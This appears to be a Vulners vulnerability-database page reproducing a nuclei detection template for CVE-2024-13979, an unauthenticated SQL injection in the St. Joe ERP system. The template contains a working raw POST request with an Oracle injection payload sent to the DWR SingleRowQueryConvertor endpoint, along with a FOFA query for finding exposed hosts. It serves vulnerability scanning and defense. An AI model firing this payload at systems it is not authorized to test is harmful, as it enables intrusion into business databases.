Lucene search
K

St. Joe ERP system - SQL Injection

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

SQL injection in St. Joe ERP system allows unauthenticated remote SQL execution via login POST.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13979
29 Aug 202521:02
circl
CNNVD
ShengQiao Technology St. Joe ERP System 安全漏洞
27 Aug 202500:00
cnnvd
CVE
CVE-2024-13979
27 Aug 202521:27
cve
Cvelist
CVE-2024-13979 St. Joe ERP System SingleRowQueryConverter SQL Injection
27 Aug 202521:27
cvelist
EUVD
EUVD-2024-54926
3 Oct 202520:07
euvd
NVD
CVE-2024-13979
27 Aug 202522:15
nvd
Positive Technologies
PT-2025-34952
27 Aug 202500:00
ptsecurity
RedhatCVE
CVE-2024-13979
30 Aug 202518:16
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-13979
14 Apr 202500:00
vulncheck_kev
Vulnrichment
CVE-2024-13979 St. Joe ERP System SingleRowQueryConverter SQL Injection
27 Aug 202521:27
vulnrichment
Rows per page
id: CVE-2024-13979

info:
  name: St. Joe ERP system - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A SQL injection vulnerability exists in the St. Joe ERP system ("圣乔ERP系统") that allows unauthenticated remote attackers to execute arbitrary SQL commands via crafted HTTP POST requests to the login endpoint. The application fails to properly sanitize user-supplied input before incorporating it into SQL queries, enabling direct manipulation of the backend database.
  impact: |
    Successful exploitation may result in unauthorized data access, modification of records, or limited disruption of service. An affected version range is undefined.
  remediation: |
    Update to the latest version of St. Joe ERP system.
  reference:
    - https://github.com/adysec/POC/blob/main/wpoc/%E5%9C%A3%E4%B9%94ERP/%E5%9C%A3%E4%B9%94ERP%E7%B3%BB%E7%BB%9FSingleRowQueryConvertor%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
    - https://www.vulncheck.com/advisories/st-joes-erp-system-sqli
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-13979
    cwe-id: CWE-89
    epss-score: 0.02899
    epss-percentile: 0.85253
    cpe: cpe:2.3:a:st._joe_erp_system_project:st._joe_erp_system:-:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 1
    fofa-query: "圣乔ERP系统"
  tags: cve,cve2024,erp,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /erp/dwr/call/plaincall/SingleRowQueryConvertor.queryForString.dwr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain

        callCount=1
        page=/erp/dwr/test/SingleRowQueryConvertor
        httpSessionId=
        scriptSessionId=D528B0534A8BE018344AB2D54E02931D86
        c0-scriptName=SingleRowQueryConvertor
        c0-methodName=queryForString
        c0-id=0
        c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(67)||CHR(86)||CHR(69)||CHR(45)||CHR(50)||CHR(48)||CHR(50)||CHR(52)||CHR(45)||CHR(49)||CHR(51)||CHR(57)||CHR(55)||CHR(57)||CHR(62))) FROM DUAL)
        c0-param1=Array:[]
        batchId=0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2024-13979"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c8623b42685f6cbcb16a4e9cdfc6416b91c5ee4f291843b0d56543ea5fe873180220485fea50e622122e0f0a6ca4e680ae33e6cf4945f9203363b550a20369193304:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.19.8
CVSS 49.3
EPSS0.02899
SSVC
15